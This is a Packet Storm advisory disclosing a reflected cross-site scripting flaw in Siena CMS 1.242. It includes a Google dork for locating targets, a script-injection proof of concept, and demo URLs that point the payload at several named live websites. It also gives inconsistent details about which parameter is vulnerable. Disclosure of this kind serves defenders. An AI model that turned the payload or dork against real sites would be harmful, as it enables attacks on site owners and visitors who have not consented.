Siena CMS 1.242 Cross Site Scripting

2012-01-01T00:00:00
ID PACKETSTORM:108288
Type packetstorm
Reporter Net.Edit0r
Modified 2012-01-01T00:00:00

Description

                                        
                                            `__________.__ __ ___ ___  
\______ \ | _____ ____ | | __ / | \ ____  
| | _/ | \__ \ _/ ___\| |/ / ______ / ~ \/ ___\  
| | \ |__/ __ \\ \___| < /_____/ \ Y / /_/ >  
|______ /____(____ /\___ >__|_ \ \___|_ /\___ /  
\/ \/ \/ \/ \//_____/  
.ORG  
----------------------------------------------------------------  
Siena CMS (1.242) <= Cross Site scripting Vulnerabilities  
----------------------------------------------------------------  
  
# Exploit Title: Siena CMS (1.242) <= Cross Site scripting Vulnerabilities  
# Application Name: [Siena CMS]  
# Date: 31/12/2011  
# Author: BHG Security Center  
# Home: Http://black-hg.org  
# Software Link: [ http://www.sienacms.com ]  
# Impact : [ low ]  
# Dork: inurl:"index.php?page="  
$ Version : [1.242]  
# Tested on: [linux+apache]  
# CVE : Webapps  
# Finder(s):  
- Net.Edit0r (Net.edit0r [at] att [dot] net)  
  
# Description: : You can use this vulnerability to take malicious ~  
XSS (ha.ckers.org/xss.html)  
  
+-----------------------+  
| Cross Site scripting |  
+-----------------------+  
  
The vulnerable code is located in /index.php?err=[XSS]  
  
  
Proof of Concept:  
-----------------  
  
~ PoC : http://localhost/index.php?page=[XSS]  
  
~ Demo : http://chelseaharbourwebdesign.com/index.php?page="><script>alert(0)</script>  
  
~ Demo : http://www.sienacms.com/index.php?page="><script>alert(0)</script>  
  
~ Demo : http://www.chelseaharbourgallery.com/index.php?page="><script>alert(0)</script>  
  
~ Demo : http://www.jessicazoobdesire.com/index.php?page="><script>alert(0)</script>  
  
  
[-] Disclosure timeline:  
  
[21/12/2011] - Vulnerabilities discovered  
[24/12/2011] - Others vulnerabilities discovered  
[27/12/2011] - Issues reported to http://black-hg.org  
[31/12/2011] - Public disclosure  
  
  
# Greets To :  
  
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ tHe.k!ll3r ~ Mr.XHat ~ Bl4ck.Viper  
  
b3hz4d ~ G3n3Rall ~ NoL1m1t ~ __SENATOR__ ~ NetQurd ~ Cyber C0der  
  
THANKS TO ALL Iranian HackerZ ./Persian Gulf  
  
===========================================[End]=============================================  
`